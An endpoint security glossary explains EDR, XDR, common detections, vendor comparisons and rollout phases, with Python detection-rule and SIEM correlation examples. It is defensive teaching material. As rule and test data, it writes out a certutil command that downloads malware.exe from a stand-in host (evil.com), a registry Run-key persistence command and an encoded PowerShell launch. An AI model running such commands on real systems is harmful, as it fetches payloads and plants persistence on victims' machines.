Endpoint Security Glossary

Endpoint Detection and Response (EDR) - Behavior-Based Endpoint Protection

EDR (Endpoint Detection and Response) goes beyond traditional antivirus: instead of simply comparing signatures, EDR analyzes process behavior in real time. It detects fileless malware, lateral movement, memory injection, and LOLBin abuse. Key products: Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Palo Alto Cortex XDR. XDR (Extended Detection and Response) extends EDR to include network, cloud, and identity into a unified platform.

EDR solves the core problem of traditional antivirus: signatures only detect known threats. Modern attackers easily bypass signatures—through obfuscation, polymorphism, or fileless attacks. EDR monitors WHAT a process does, not HOW it looks.

EDR vs. Antivirus vs. XDR

Generation 1: Antivirus (AV)

  • Method: Signature comparison (hash/pattern)
  • Detects: known malware
  • Blind to: new malware, obfuscation, fileless attacks
  • Response: Delete/quarantine file

Ease of bypass: A single modified byte results in a new hash with no match. Base64 encoding of a PowerShell script also produces no match. Living-off-the-land (certutil, mshta) does not trigger antivirus detection.

Generation 2: NGAV (Next-Gen AV)

  • Method: ML + static analysis + signatures
  • Detects: known + unknown malware families
  • Blind to: behavioral anomalies, memory-only attacks

Generation 3: EDR

  • Method: Behavioral monitoring of all processes
  • Detects: fileless attacks, injection, LOLBins, memory manipulation
  • Views: Process tree diagram (who spawned whom?)
  • Response: Isolation, kill, forensic snapshot

Generation 4: XDR (Extended Detection and Response)

  • Method: Correlation across endpoint + network + cloud + identity
  • Detects: complex multi-stage attacks
  • Example: Endpoint alert + cloud login anomaly = an incident
  • Products: Microsoft Defender XDR, Palo Alto Cortex XDR

EDR Core Capabilities

  • Telemetry: All processes, network connections, registry changes
  • Detection: Behavioral rules + ML + Threat Intel IOCs
  • Investigation: Visualize attack tree (parent→child processes)
  • Response: Isolation, process kill, remote forensics
  • Hunting: Proactive search for indicators of compromise

Core EDR Detections

Process Injection

  • Injecting code into a foreign process (e.g., svchost.exe)
  • Techniques: CreateRemoteThread, Process Hollowing, DLL Injection
  • EDR detects anomalous memory write operations in third-party processes
  • Event: suspicious memory allocation + execution in svchost.exe

LOLBin (Living-off-the-Land)

Abuse of legitimate Windows tools such as mshta.exe, regsvr32.exe, certutil.exe, rundll32.exe.

Example rule: Alert if certutil.exe is called with a URL parameter (download indicator):

certutil.exe -urlcache -split -f http://evil.com/malware.exe

Legitimate use is rare – an alert is triggered immediately.

Fileless Malware

  • Only in RAM – no file on disk
  • PowerShell: encoded command + AMSI bypass
  • Reflective DLL Loading: Load DLL directly into memory
  • EDR detects PowerShell process with Base64 content → Alert

AMSI Bypass Detection

  • Attacker patches AMSI (AntiMalware Scan Interface) in RAM
  • EDR detects memory write to AMSI.dll region → immediate alert

Signed Binary Abuse (DLL Hijacking)

  • Signed binary with malicious side-DLL
  • EDR detects DLL from unexpected location → alert

Persistence Detection

EDR detects and alerts on all common persistence techniques:

  • Registry Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run)
  • Scheduled task created
  • WMI event subscription
  • Startup folder
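The certutil rule from the LOLBin section, the encoded-PowerShell indicator from the fileless section, and the Run-key persistence check, written as a small behavioral rule set run over process-creation telemetry. This is an added example, not code from any of the products on this page; the event fields, rule names, sample command lines and the winword.exe parent are constructed, and the PowerShell rule decodes the Base64 argument as UTF-16LE, which is how the interpreter itself reads -EncodedCommand.

```python
import base64
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:          # one process-creation record from the sensor (constructed format)
    image: str               # executable name (path stripped for brevity)
    cmdline: str             # full command line
    parent: str              # parent executable name

RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def certutil_download(ev):
    # LOLBin rule from the text: certutil.exe called with a URL (download indicator)
    cl = ev.cmdline.lower()
    return ev.image.lower() == "certutil.exe" and "-urlcache" in cl and "http" in cl

def encoded_powershell(ev):
    # Fileless indicator: PowerShell started with a Base64 (UTF-16LE) command.
    # The blob is decoded so the alert can carry the clear-text command.
    m = ev.image.lower() == "powershell.exe" and ENC_FLAG.search(ev.cmdline)
    if not m:
        return False
    try:
        base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        return True
    except (ValueError, UnicodeDecodeError):
        return False

def run_key_persistence(ev):
    # Persistence rule: reg.exe writing below the HKCU Run key
    return ev.image.lower() == "reg.exe" and RUN_KEY in ev.cmdline.lower()

RULES = {"LOLBin: certutil download": certutil_download, "Fileless: encoded PowerShell": encoded_powershell,
         "Persistence: HKCU Run key": run_key_persistence}

def evaluate(events):
    # Return (rule name, "parent -> image") for every event that trips a rule
    return [(name, f"{ev.parent} -> {ev.image}")
            for ev in events for name, rule in RULES.items() if rule(ev)]

# Constructed telemetry for the demo; the last event is benign and must stay silent.
ENC = base64.b64encode("Get-Process".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent("certutil.exe", "certutil.exe -urlcache -split -f http://evil.com/malware.exe", "cmd.exe"),
    ProcessEvent("powershell.exe", "powershell.exe -nop -w hidden -enc " + ENC, "winword.exe"),
    ProcessEvent("reg.exe", r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\u.exe", "cmd.exe"),
    ProcessEvent("certutil.exe", r"certutil.exe -hashfile C:\Temp\image.iso SHA256", "cmd.exe"),
]
```

Running evaluate(SAMPLE_EVENTS) yields three hits and none for the benign hash check, which is the tuning question each rule has to survive in the pilot phase.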

EDR Products Compared

Microsoft Defender for Endpoint (MDE)

Strengths:

  • Native Windows integration (deep within the OS)
  • M365/Entra integration: Identity + Endpoint
  • Attack Surface Reduction (ASR) Rules
  • Defender Antivirus integrated
  • Microsoft Sentinel: seamless SIEM integration
  • Cost-effective for Microsoft shops (in the E5 bundle)

Weaknesses:

  • Mac/Linux: less mature than Windows
  • Lower telemetry granularity than CrowdStrike

Costs: Defender for Business approx. 3 EUR/user/month (SMB); E5 bundle approx. 52 EUR/user/month (all-inclusive)

CrowdStrike Falcon

Strengths:

  • Market leader in the EDR industry (Gartner Magic Quadrant)
  • OverWatch: 24/7 threat hunting by the CrowdStrike team
  • Best cross-platform coverage (Windows/Mac/Linux)
  • Threat Graph: global threat intelligence from millions of sensors

Weaknesses:

  • Very expensive
  • Noted: In July 2024, a sensor update caused a global BSOD outage

Lesson learned: Testing updates before a global rollout is mandatory.

SentinelOne Singularity

Strengths:

  • Fully automated remediation (no analyst required)
  • Storyline: Attack graph is automatically generated
  • Autonomous Response: isolates, kills, and rolls back without human intervention
  • Singularity XDR: SIEM + EDR integrated

Particularly suitable for companies that prioritize automation.

Palo Alto Cortex XDR

  • Strong network integration (Prisma + XDR)
  • Well-suited if NGFW is already from Palo Alto
  • Very comprehensive, complex to operate

EDR Implementation: Rollout Strategy

Phase 1: Pilot Group (Weeks 1–4)

  • 50–100 computers (IT department, non-critical systems)
  • Monitoring mode: alerts only, no blocking
  • Tuning: identify and exclude false positives
  • Baseline: learn normal activity patterns

Phase 2: Expanded pilot group (Weeks 5–8)

  • 500 computers (various departments)
  • Activate first block rules (high-confidence detections only)
  • Integrate help desk: Employees report EDR blocks
  • Escalation path: SOC analyst → IT admin → Help desk

Phase 3: Full rollout (Months 3–6)

  • All endpoints + servers
  • Activate advanced rules (after baseline learning)
  • Automated response: critical threats are immediately isolated

False Positive Management

The first 4 weeks: alert only, no block. Afterward, gradually enable blocking for high-confidence rules. IT knows the legitimate exceptions (such as monitoring tools) that must not be blocked.

Common False Positives:

  • Backup software: reads many files → may trigger ransomware detection
  • Developer tools: code injection during debugging → EDR alert possible
  • Automated tests: exploit code in test environments

EDR Telemetry for SIEM

  • EDR delivers high-quality events to the SIEM (CEF/Syslog)
  • Correlation: EDR alert + SIEM context = better triage
  • Example: EDR alert “Kerberoasting” + AD event 4769 = joint incident
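The Kerberoasting example above, carried through as a SIEM correlation: each EDR alert is joined to Event ID 4769 (Kerberos service ticket requested) from the same source host inside a short time window, and confidence is graded by what the AD context adds. This is an added example, not any SIEM's rule language; the alerts, hosts and events are constructed and the field names are simplified, while the use of ticket encryption type 0x17 (RC4-HMAC) as the classic Kerberoasting tell is standard detection practice.

```python
from datetime import datetime, timedelta

# Constructed sample data: two EDR alerts and a handful of domain-controller security events.
# 4769 = "A Kerberos service ticket was requested"; etype 0x17 is RC4-HMAC, 0x12 is AES256.
EDR_ALERTS = [
    {"ts": "2024-05-02T10:14:05", "host": "WS-042", "user": "jdoe", "name": "Kerberoasting"},
    {"ts": "2024-05-02T11:30:00", "host": "WS-007", "user": "asmith", "name": "Kerberoasting"},
]
AD_EVENTS = [
    {"ts": "2024-05-02T10:13:50", "id": 4769, "src": "WS-042", "service": "MSSQLSvc/db01", "etype": "0x17"},
    {"ts": "2024-05-02T10:13:51", "id": 4769, "src": "WS-042", "service": "http/web01", "etype": "0x17"},
    {"ts": "2024-05-02T09:00:00", "id": 4769, "src": "WS-042", "service": "cifs/fs01", "etype": "0x12"},
    {"ts": "2024-05-02T10:14:00", "id": 4624, "src": "WS-042"},   # logon event, not a ticket request
]

def correlate(alerts, events, window=timedelta(minutes=5)):
    # Join each EDR alert to 4769 events from the same source host within +/- window,
    # then grade confidence: RC4 service tickets nearby -> high, any tickets -> medium, none -> low.
    incidents = []
    for a in alerts:
        t = datetime.fromisoformat(a["ts"])
        tickets = [e for e in events if e["id"] == 4769 and e["src"] == a["host"]
                   and abs(datetime.fromisoformat(e["ts"]) - t) <= window]
        rc4 = [e["service"] for e in tickets if e.get("etype") == "0x17"]
        confidence = "high" if rc4 else "medium" if tickets else "low"
        incidents.append({"alert": a["name"], "host": a["host"], "user": a["user"],
                          "tickets": sorted(e["service"] for e in tickets),
                          "rc4_tickets": len(rc4), "confidence": confidence})
    return incidents

if __name__ == "__main__":
    for inc in correlate(EDR_ALERTS, AD_EVENTS):
        print(inc)
```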